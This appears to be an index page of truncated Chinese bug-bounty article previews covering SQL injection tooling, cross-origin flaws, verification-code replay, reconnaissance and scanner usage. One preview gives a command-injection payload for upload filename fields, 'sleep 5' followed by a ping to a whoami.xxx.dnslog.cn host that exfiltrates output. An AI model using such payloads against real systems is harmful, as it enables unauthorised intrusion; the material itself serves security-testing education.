http://github.com/ggg4566/SQLEXP SQL 注入利用工具，存在waf的情况下自定义编写tamper脚本 dump数据. 对于SQL注入漏洞利用通常情况下我们使用SQLMAP，在waf存在的场景下想利用自己独有的paylo...

web漏洞挖掘指南 前端跨域漏洞 一、何为跨域 1.设想一种场景，一个恶意网站上嵌入了一个iframe标签去加载银行的登陆页面，高度和宽度的设置和真实的银行官网一样，当用户访问恶意网站并登录时，...

前言： 第一次挖这家src，看src自己给出的资产(赞一个)，打开网站是一个电子商务C2C业务，大致扫了一眼业务，网站功能挺多的，出了不少货，挖的过程中，导致一些诡异的逻辑被触发了，在此仅对系...

应用场景：验证码没有设置失效时间，且请求包可无限重放（比如登录，注册，绑定，解绑，修改密码，领优惠券等实际场景） 某支付众测案例：验证码有效期过长导致银行卡与任意xx账号绑定 绑定银行...

0x01 作为一个在安全小天地平台挖洞一年多的菜鸡，也是利用这段时间成功的从一个小菜鸡变成了一个大菜鸡。 0x02 在我个人看来挖src最重要的便是信息收集以及挖洞思路，挖洞思路的话可以去安全小...

尝试寻找试用平台，这样可免费开通账号权限，免去登录认证，寻找更多后台存在的漏洞！搜关键字+免费试用、xxx技术支持或者直接搜备案信息，有大量免费试用平台的厂商： 申请试用权限后在后台用...

通过企业名+关键词的方法进行排查，常见关键词有：合同，设计图纸，身份证，通讯录，花名册，报表，投标文件，入职等。 情报提交时说明网盘链接和截图，方便厂商排查即可。 推荐几个本人常用的...

文件上传表单中出现的命令注入漏洞，常出现在filename或path参数中，可以使用sleep 5确认响应延时后再用ping whoami.xxx.dnslog.cn获取命令执行结果： 文字来源于- 火线 Zone-云安全社区，安全...

在安全小天地平台的火器中看到一个资产，居然是空白页面，空白页面就没有漏洞？？？偏偏不信邪，上手就是干！ http://xxx.target.com 打开页面啥也没有，一片空白 F12看下JS中的API接口，发现有...

让dirsearch充当爬虫的角色，xray对其传入的流量进行扫描。 xray：xray.exe webscan --listen 127.0.0.1:7776 --html-output reportdatetime.html dirsearch：-L URLLIST, --url-list=URLLIST ...

前言 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 一、漏洞挖掘 由于是做项目客户大大会直接将测试系统甩过来,所...

注意：本文章只适用于有授权书的项目，切忌不要非法操作，本号不负任何责任，本文不会带上任何工具链接，如有需要自行查找 在信息安全这一行业，我们会遇到各种各样的项目点，比如一个目标到100...

0x01 前言 在我们渗透或者漏洞挖掘的过程中，发现越来越多的网站使用webpack技术，开发人员通常会把api路由打包进js文件里。JSFinder这款工具可以帮助我们快速从js文件中提取api和其他敏感信息...

漏洞报告 Acronis #1070533 Acronis True Image 2021 (windows) does not validate server hostname on a login TLS connection Elastic #1218680 Improper authorization on /api/as/v1/creden...

思考题?：当我们遇到这些解析到内网IP的域名的时候，可以干什么？ 提示1: 可参考【搬运工】版块帖子 http://zone.huoxian.cn/t/porter?sort=newest 文字来源于- 火线 Zone-云安全社区，安全小天...

前言 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 一、原创漏洞证书获取条件 图1-1 证书获取条件 二、信息收集 ...